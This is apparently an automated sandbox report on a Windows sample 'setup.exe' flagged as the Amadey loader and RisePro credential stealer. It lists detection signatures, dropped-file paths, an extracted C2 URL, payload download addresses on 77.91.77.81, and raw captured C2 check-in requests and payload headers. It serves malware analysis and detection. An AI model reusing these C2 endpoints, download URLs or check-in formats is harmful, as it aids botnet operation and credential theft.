Windows Analysis Report
setup.exe

Overview

General Information

Sample name: setup.exe
Analysis ID: 1460137
MD5: 20fe52f3ba934b9b7454c194f44d74d0
SHA1: f38c3041926f329dac459bacce67850dc58ab15a
SHA256: 3dca9b74c06babae491aef6495a256d6d26a4539cdc680b64ea4e0daee9cf603
Tags: exe
Infos:

Detection

Amadey, RisePro Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected RisePro Stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Creates multiple autostart registry keys
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Add Scheduled Task Parent
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: setup.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\1000015002\b6042db502.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: explortu.exe.2892.2.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://147.45.47.155/ku4Nor9/index.php"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe ReversingLabs: Detection: 50%
Multi AV Scanner detection for submitted file
Source: setup.exe ReversingLabs: Detection: 50%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Joe Sandbox ML: detected
Source: C:\Users\user\1000015002\b6042db502.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\sarra[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: setup.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E46B00 CryptUnprotectData,CryptUnprotectData, 27_2_00E46B00
Uses 32bit PE files
Source: setup.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49719 version: TLS 1.0
Source: unknown HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.5:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.5:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49796 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49798 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49808 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49811 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49812 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49818 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.5:49843 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49881 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49884 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49885 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49888 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.189.173.12:443 -> 192.168.2.5:49942 version: TLS 1.2
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E46000 FindFirstFileA,FindNextFileA, 27_2_00E46000
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E66770 FindFirstFileA,FindNextFileA,SetFileAttributesA,RemoveDirectoryA,std::_Throw_Cpp_error,std::_Throw_Cpp_error, 27_2_00E66770
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00DB1F9C FindFirstFileExW, 27_2_00DB1F9C

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.5:49705 -> 147.45.47.155:80
Source: Traffic Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 147.45.47.155:80 -> 192.168.2.5:49705
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 147.45.47.155
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 77.91.77.66 ports 0,5,7,8,58709,9
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49726 -> 77.91.77.66:58709
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 20 Jun 2024 13:38:05 GMTContent-Type: application/octet-streamContent-Length: 2396672Last-Modified: Thu, 20 Jun 2024 10:15:18 GMTConnection: keep-aliveETag: "66740136-249200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6a 99 1d e4 2e f8 73 b7 2e f8 73 b7 2e f8 73 b7 65 80 70 b6 25 f8 73 b7 65 80 76 b6 ee f8 73 b7 65 80 74 b6 2f f8 73 b7 ec 79 8e b7 2a f8 73 b7 ec 79 77 b6 3d f8 73 b7 ec 79 70 b6 34 f8 73 b7 ec 79 76 b6 75 f8 73 b7 65 80 77 b6 36 f8 73 b7 65 80 75 b6 2f f8 73 b7 65 80 72 b6 35 f8 73 b7 2e f8 72 b7 0e f9 73 b7 dd 7a 7a b6 32 f8 73 b7 dd 7a 8c b7 2f f8 73 b7 2e f8 e4 b7 2f f8 73 b7 dd 7a 71 b6 2f f8 73 b7 52 69 63 68 2e f8 73 b7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 14 69 4c 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 bc 15 00 00 66 03 00 00 00 00 00 00 80 5d 00 00 10 00 00 00 d0 15 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 5d 00 00 04 00 00 03 f6 24 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5e c0 18 00 72 00 00 00 00 a0 18 00 34 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 66 5d 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 66 5d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c 36 18 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 18 00 00 10 00 00 00 b4 0a 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 34 19 00 00 00 a0 18 00 00 1a 00 00 00 c4 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 c0 18 00 00 02 00 00 00 de 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 d0 18 00 00 02 00 00 00 e0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 69 78 6b 6c 68 6c 6d 00 90 19 00 00 e0 43 00 00 88 19 00 00 e2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 79 7a 76 6e 74 76 62 00 10 00 00 00 70 5d 00 00 06 00 00 00 6a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 5d 00 00 22 00 00 00 70 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 20 Jun 2024 13:38:09 GMTContent-Type: application/octet-streamContent-Length: 1888256Last-Modified: Thu, 20 Jun 2024 10:16:14 GMTConnection: keep-aliveETag: "6674016e-1cd000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 2a cf 5e 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 40 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4b 00 00 04 00 00 df 9c 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a0 06 00 6c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 26 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 25 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 78 65 6e 6e 74 6c 6a 00 c0 19 00 00 70 31 00 00 b8 19 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 66 71 6b 61 74 73 7a 00 10 00 00 00 30 4b 00 00 04 00 00 00 aa 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4b 00 00 22 00 00 00 ae 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 20 Jun 2024 13:38:13 GMTContent-Type: application/octet-streamContent-Length: 2471424Last-Modified: Thu, 20 Jun 2024 10:14:41 GMTConnection: keep-aliveETag: "66740111-25b600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6a 99 1d e4 2e f8 73 b7 2e f8 73 b7 2e f8 73 b7 65 80 70 b6 25 f8 73 b7 65 80 76 b6 ee f8 73 b7 65 80 74 b6 2f f8 73 b7 ec 79 8e b7 2a f8 73 b7 ec 79 77 b6 3d f8 73 b7 ec 79 70 b6 34 f8 73 b7 ec 79 76 b6 75 f8 73 b7 65 80 77 b6 36 f8 73 b7 65 80 75 b6 2f f8 73 b7 65 80 72 b6 35 f8 73 b7 2e f8 72 b7 0e f9 73 b7 dd 7a 7a b6 32 f8 73 b7 dd 7a 8c b7 2f f8 73 b7 2e f8 e4 b7 2f f8 73 b7 dd 7a 71 b6 2f f8 73 b7 52 69 63 68 2e f8 73 b7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 14 69 4c 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 bc 15 00 00 7c 03 00 00 00 00 00 00 50 60 00 00 10 00 00 00 d0 15 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 60 00 00 04 00 00 82 69 26 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5e c0 18 00 72 00 00 00 00 a0 18 00 38 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 60 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 3d 60 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c 36 18 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 18 00 00 10 00 00 00 b4 0a 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 38 16 00 00 00 a0 18 00 00 18 00 00 00 c4 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 c0 18 00 00 02 00 00 00 dc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2c 00 00 d0 18 00 00 02 00 00 00 de 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 70 72 62 6c 63 66 63 00 b0 1a 00 00 90 45 00 00 b0 1a 00 00 e0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 6a 6b 78 77 6b 79 71 00 10 00 00 00 40 60 00 00 04 00 00 00 90 25 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 60 00 00 22 00 00 00 94 25 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 20 Jun 2024 13:38:17 GMTContent-Type: application/octet-streamContent-Length: 2400256Last-Modified: Thu, 20 Jun 2024 10:16:33 GMTConnection: keep-aliveETag: "66740181-24a000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 f7 00 74 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 1c 08 00 00 00 00 00 00 10 56 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 56 00 00 04 00 00 36 17 25 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4b b0 11 00 5f 00 00 00 00 40 0d 00 7c 61 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 97 55 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 97 55 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 30 0d 00 00 10 00 00 00 38 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 7c 61 04 00 00 40 0d 00 00 60 04 00 00 48 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 11 00 00 02 00 00 00 a8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2a 00 00 c0 11 00 00 02 00 00 00 aa 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 63 73 6e 64 79 75 75 00 d0 19 00 00 30 3c 00 00 ce 19 00 00 ac 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6a 67 6c 69 6a 68 64 00 10 00 00 00 00 56 00 00 04 00 00 00 7a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 56 00 00 22 00 00 00 7e 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: */*APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENhIsZk1icdmK4NNtUk6KLPgAMvy17Udgd1MlHE7GXRAxu9wDd84HaOk1nGIMKru6radFnZDfu7zWhcmz9j72MdI/lM5JykN5JyMCsrKKjhnWsxMrSmUTHFAm4lCtsR/4kXJ5OVGBubVm1qKlLaqfTPe4/QIS6EsPZhp2A+GbXPmd9v7KWe0y9ZBVkGnVgT2XAL69MHD65Z2sZ/bvdyK2Z9GRgl5dhajOwb9unLzQz2LihgZzhVMiIEIlP0Ox0qtNEB072yB6rGFSpbQMfXp3Qm9wrLMHPG0cNIMKQ3+lgA3sY/VTGnPGJVnsHSsfW8D9dyBIAE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1718890987142Host: self.events.data.microsoft.comContent-Length: 7972Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 37 37 33 42 32 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A78B22773B25882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /cost/sarra.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 34 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000014031&unit=246122658369
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 35 30 30 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000015002&unit=246122658369
